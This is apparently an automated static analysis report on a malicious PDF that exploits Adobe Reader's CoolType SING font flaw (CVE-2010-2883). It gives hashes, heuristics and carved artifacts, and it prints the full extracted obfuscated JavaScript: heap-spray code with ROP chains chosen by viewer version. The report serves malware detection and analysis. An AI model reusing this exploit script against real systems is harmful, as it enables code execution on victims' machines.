Malicious PDF — malware analysis report

Static analysis result for SHA-256 87c2dfc58f5ecc67…

Verdict: MALICIOUS
File type: PDF
Size: 521.1 KB
First seen: 2026-05-10
MD5: 0b6d3c245b8eaa57da7e236c20a511e4
SHA-1: 281504940b914705f958d193f8682163baf4e76a
SHA-256: 87c2dfc58f5ecc67280cbc5660eade4543f8dcf0340b39b2988bd2491c9301eb
Risk Score: 166

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF contains embedded JavaScript and utilizes the CVE-2010-2883 exploit targeting Adobe Reader's CoolType SING font parsing. The JavaScript is obfuscated but uses `unescape` and appears to construct a URL, likely for downloading a secondary payload. The presence of XFA forms and AcroForm buttons suggests interactive elements designed to trigger the exploit.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9937

Heuristics (9)

  • Adobe Reader CoolType SING font exploit — CVE-2010-2883 [critical] [CVE likely] rule: CVE_2010_2883
    PDF embeds a TrueType/OpenType font with an actual SING table and pairs it with JavaScript heap-spray shellcode. This matches the public Adobe Reader CoolType SING exploit shape for CVE-2010-2883.
  • ASCIIHexDecode filter (with exploit indicators) [medium] rule: PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact [medium] rule: EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action [low] [1 related finding] rule: PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream [low] rule: PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form [low] rule: PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • AcroForm button with action trigger [low] rule: PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • PDF differential parser failed [info] rule: PDF_DIFFERENTIAL_PARSE_FAILED
    The cross-check parser (pdfminer.six) failed on this file: PDF differential parser failed: AssertionError. Static heuristics still ran and any of their findings above are valid; only the differential cross-check signal is missing.
  • Embedded URL [info] rule: EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL (channel: In PDF document text for every entry below)
    • http://www.bitstream.com
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xfa/promoted-desc/
    • http://ns.adobe.com/xdp/
    • http://www.xfa.org/schema/xci/2.6/
    • http://www.xfa.org/schema/xfa-template/2.6/
    • http://www.xfa.org/schema/xfa-locale-set/2.7/
    • http://www.xfa.org/schema/xfa-locale-set/2.6/
    • http://www.xfa.org/schema/xfa-form/2.8/
    • http://www.xfa.org/schema/xfa-data/1.0/

Extracted artifacts (7)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size

javascript_obj0026_000.js | pdf-javascript-stream | PDF /JS object 26 at offset 0x47BF | 9663 bytes
SHA-256: 1a5d1977beaa0cc0b6451de1d06695d971caaa74dae808216ea03238c520bffa
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
var Juaidai = 12;
var Tolbqnpp = "";

function Vnyhayduv(Gklcbtj,times){
 Ipugpqlbvtw = ""
 var Otdwcwgpeznj;
 var Juaidai = 723;
 for (Otdwcwgpeznj=0;Otdwcwgpeznj<times;Otdwcwgpeznj++){
 Juaidai = 1;
 Ipugpqlbvtw = Ipugpqlbvtw + Gklcbtj;
 }
 return Ipugpqlbvtw;
}

function Oovachwigu(Jxapyyyksdkd){
 var Juaidai = 12;
 return unescape(Jxapyyyksdkd);
}


var Pimfmtggbh = Tolbqnpp+"&%!".charAt(1)+Tolbqnpp;
Pimfmtggbh = Tolbqnpp + Pimfmtggbh + Tolbqnpp+"u"+Tolbqnpp;
Vbiiclkvlyyl = "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" ;

var Enchfcuvtwn = (app.viewerVersion / 10.0);
Vbiiclkvlyyl = Vbiiclkvlyyl.replace(/M/g,Pimfmtggbh);
var Ycjygwhscgnv = this;
Vbiiclkvlyyl = Oovachwigu(Vbiiclkvlyyl);

function Htbcdm(Vbiiclkvlyyl,Bzubmlxlbf,Bkesxwjtsb){
 var Olalun = 1024;
 
 var Saqytin = Vnyhayduv(Bzubmlxlbf,Olalun);
 var Uipcwelcwl = Vnyhayduv(Bzubmlxlbf,Olalun-(Vbiiclkvlyyl.length/2))+Vbiiclkvlyyl;
 
 var FvzlbcjckcfOfFirstEntry = Vnyhayduv(Bzubmlxlbf,Olalun-18);
 var FvzlbcjckcfOfOtherEntry = Vnyhayduv(Bzubmlxlbf,Olalun-11);

 var Vxcuul = [];
 for( Otdwcwgpeznj = 0; Otdwcwgpeznj < 16-2; Otdwcwgpeznj++ ){
 Vxcuul.push( Saqytin );
 }
 Vxcuul.push(Uipcwelcwl);
 var Lvxgmunsmebw = Vxcuul.join("");

 Ycjygwhscgnv.Hpedba = new Array();
 var Wafaue = 0;
 for( Otdwcwgpeznj = 0; Otdwcwgpeznj < Bkesxwjtsb; Otdwcwgpeznj++ ){
 if (Otdwcwgpeznj == 0){
 Ycjygwhscgnv.Hpedba[Otdwcwgpeznj] = FvzlbcjckcfOfFirstEntry+Lvxgmunsmebw;
 } else{
 Ycjygwhscgnv.Hpedba[Otdwcwgpeznj] = FvzlbcjckcfOfOtherEntry+Lvxgmunsmebw;
 }
 }
}


Uzwnncyhd = "M4142M4241";
Uzwnncyhd = Uzwnncyhd.replace(/M/g,Pimfmtggbh);
Uzwnncyhd = Oovachwigu(Uzwnncyhd);


if ( app.platform == "WIN" ){ 
 if ( Enchfcuvtwn <= 0.5999 ) {
 app.alert("Please update your PDF viewer software.");
 } else if ( Enchfcuvtwn <= 0.6999999999 ) {
 global.Mvckuabj = Vnyhayduv(Uzwnncyhd,500)+Vbiiclkvlyyl;
 Ycjygwhscgnv.pageNum = 11;
 } else if ( Enchfcuvtwn <= 0.7999999999 ) {
 global.Mvckuabj = Vnyhayduv(Uzwnncyhd,500)+Vbiiclkvlyyl;
 Ycjygwhscgnv.pageNum = 12; 
 } else if ( Enchfcuvtwn <= 0.8999999999 ) {
 Lfobubh = "";
Lfobubh = Lfobubh +"M17f2M4a82M5000M4a84M630fM4a80M7ec9M4a";
Lfobubh = Lfobubh +"81M203cM4a82M57bcM4a80M156aM4a82M54e0M";
Lfobubh = Lfobubh +"4a82M0000M1000M0000M0000M0000M0000M000";
Lfobubh = Lfobubh +"2M0000M0102M0000M0000M0000M17f2M4a82M1";
Lfobubh = Lfobubh +"56aM4a82Mfe83M4a81Me982M4a81M0008M0000";
Lfobubh = Lfobubh +"M597dM4a80M7ec9M4a81M2038M4a82M57bcM4a";
Lfobubh = Lfobubh +"80M156aM4a82MffffMffffM0000M0000M0040M";
Lfobubh = Lfobubh +"0000M0000M0000M0000M0001M0000M0000M17f";
Lfobubh = Lfobubh +"2M4a82M156aM4a82Mfe83M4a81Me982M4a81M0";
Lfobubh = Lfobubh +"008M0000M597dM4a80M7ec9M4a81M2030M4a82";
Lfobubh = Lfobubh +"M57bcM4a80M156aM4a82MffffMffffM0022M00";
Lfobubh = Lfobubh +"00M0000M0000M0000M0000M0000M0001M17f2M";
Lfobubh = Lfobubh +"4a82M5004M4a84M630fM4a80M17f2M4a82M156";
Lfobubh = Lfobubh +"aM4a82Mfe83M4a81Me982M4a81M0030M0000M5";
Lfobubh = Lfobubh +"97dM4a80M7ec9M4a81M5004M4a84Ma649M4a81";
Lfobubh = Lfobubh +"M17f2M4a82M156aM4a82Mfe83M4a81Me982M4a";
Lfobubh = Lfobubh +"81M0020M0000M597dM4a80M17f2M4a82M156aM";
Lfobubh = Lfobubh +"4a82M00a0M4a82M7ec9M4a81M0034M0000M795";
Lfobubh = Lfobubh +"aM4a80M17f2M4a82M156aM4a82Mfe83M4a81Me";
Lfobubh = Lfobubh +"982M4a81M000aM0000M597dM4a80M7ec9M4a81";
Lfobubh = Lfobubh +"M2140M4a82M57bcM4a80MffffMffffMffffMff";
Lfobubh = Lfobubh +"ffMffffMffffM1000M0000M258bM5000M4a84M";
Lfobubh = Lfobubh +"4d4d";

 Lfobubh = Lfobubh.replace(/M/g,Pimfmtggbh);
 Lfobubh = Oovachwigu(Lfobubh);
 Djcxdzbvuhef = "";
Djcxdzbvuhef = Djcxdzbvuhef +"M12c4M4a80";

 Djcxdzbvuhef = Djcxdzbvuhef.replace(/M/g,Pimfmtggbh);
 Djcxdzbvuhef = Oovachwigu(Djcxdzbvuhef);
 
 Htbcdm(Lfobubh + Vbiiclkvlyyl,Djcxdzbvuhef,2000);
 Ycjygwhscgnv.pageNum = 13;
 } else if ( Enchfcuvtwn <= 0.9999999999 ) {
 Nircgsipef = "";
Nircgsipef = Nircgsipef +"M63a5M4a80M0000M4a8aM2196M4";
Nircgsipef = Nircgsipef +"a80M1f90M4a80M903cM4a84Mb69";
Nircgsipef = Nircgsipef +"2M4a80M1064M4a80M22c8M4a85M";
Nircgsipef = Nircgsipef +"0000M1000M0000M0000M0000M00";
Nircgsipef = Nircgsipef +"00M0002M0000M0102M0000M0000";
Nircgsipef = Nircgsipef +"M0000M63a5M4a80M1064M4a80M2";
Nircgsipef = Nircgsipef +"db2M4a84M2ab1M4a80M0008M000";
Nircgsipef = Nircgsipef +"0Ma8a6M4a80M1f90M4a80M9038M";
Nircgsipef = Nircgsipef +"4a84Mb692M4a80M1064M4a80Mff";
Nircgsipef = Nircgsipef +"ffMffffM0000M0000M0040M0000";
Nircgsipef = Nircgsipef +"M0000M0000M0000M0001M0000M0";
Nircgsipef = Nircgsipef +"000M63a5M4a80M1064M4a80M2db";
Nircgsipef = Nircgsipef +"2M4a84M2ab1M4a80M0008M0000M";
Nircgsipef = Nircgsipef +"a8a6M4a80M1f90M4a80M9030M4a";
Nircgsipef = Nircgsipef +"84Mb692M4a80M1064M4a80Mffff";
Nircgsipef = Nircgsipef +"MffffM0022M0000M0000M0000M0";
Nircgsipef = Nircgsipef +"000M0000M0000M0001M63a5M4a8";
Nircgsipef = Nircgsipef +"0M0004M4a8aM2196M4a80M63a5M";
Nircgsipef = Nircgsipef +"4a80M1064M4a80M2db2M4a84M2a";
Nircgsipef = Nircgsipef +"b1M4a80M0030M0000Ma8a6M4a80";
Nircgsipef = Nircgsipef +"M1f90M4a80M0004M4a8aMa7d8M4";
Nircgsipef = Nircgsipef +"a80M63a5M4a80M1064M4a80M2db";
Nircgsipef = Nircgsipef +"2M4a84M2ab1M4a80M0020M0000M";
Nircgsipef = Nircgsipef +"a8a6M4a80M63a5M4a80M1064M4a";
Nircgsipef = Nircgsipef +"80MaedcM4a80M1f90M4a80M0034";
Nircgsipef = Nircgsipef +"M0000Md585M4a80M63a5M4a80M1";
Nircgsipef = Nircgsipef +"064M4a80M2db2M4a84M2ab1M4a8";
Nircgsipef = Nircgsipef +"0M000aM0000Ma8a6M4a80M1f90M";
Nircgsipef = Nircgsipef +"4a80M9170M4a84Mb692M4a80Mff";
Nircgsipef = Nircgsipef +"ffMffffMffffMffffMffffMffff";
Nircgsipef = Nircgsipef +"M1000M0000M258bM0000M4a8aM4";
Nircgsipef = Nircgsipef +"d4d";

 Nircgsipef = Nircgsipef.replace(/M/g,Pimfmtggbh);
 Nircgsipef = Oovachwigu(Nircgsipef);
 Zxwhjjr = "";
Zxwhjjr = Zxwhjjr +"M1064M4a80";

 Zxwhjjr = Zxwhjjr.replace(/M/g,Pimfmtggbh);
 Zxwhjjr = Oovachwigu(Zxwhjjr);
 
 Htbcdm(Nircgsipef + Vbiiclkvlyyl,Zxwhjjr,2000);
 Ycjygwhscgnv.pageNum = 14;
 } else{
 app.alert("Please update your PDF viewer software.");
 }
}else{
 app.alert("Please update your PDF viewer software.");
}
font_00_cff_off00003a54.bin | pdf-font-stream | PDF embedded font (cff) at offset 0x3A54 | 1138 bytes
SHA-256: ea8f409c7366ed46eeb553aa7b404f04641f482ba88463fbe253da60be5787e5

font_01_sfnt_off000070c8.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x70C8 | 8084 bytes
SHA-256: e31f8c8507e52f29008d946a00becde9f839e34cb108985ce66167bf881adafa

font_11_sfnt_off000149fa.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x149FA | 65932 bytes
SHA-256: 422bc5698ba5d9d4818f6a2d8b3abca2f723e713b44a15c390139d2c976a1388

font_12_sfnt_off0001e85c.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x1E85C | 65932 bytes
SHA-256: 7e24ee16c8b09ee74d61445f29c3c0a95abfdf17fc1008606394f159dbd0c106
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

font_13_sfnt_off000286ba.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x286BA | 65932 bytes
SHA-256: 57e24925bc6bdb98d38e8b4ba3b87f80f75c5e49ea9a522486790d7dc6848549
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

font_14_sfnt_off000324e1.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x324E1 | 65932 bytes
SHA-256: 1f068d668b316fcb46f0801be00137fb749cc7fda5ca15e442829d6c303d8f99
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)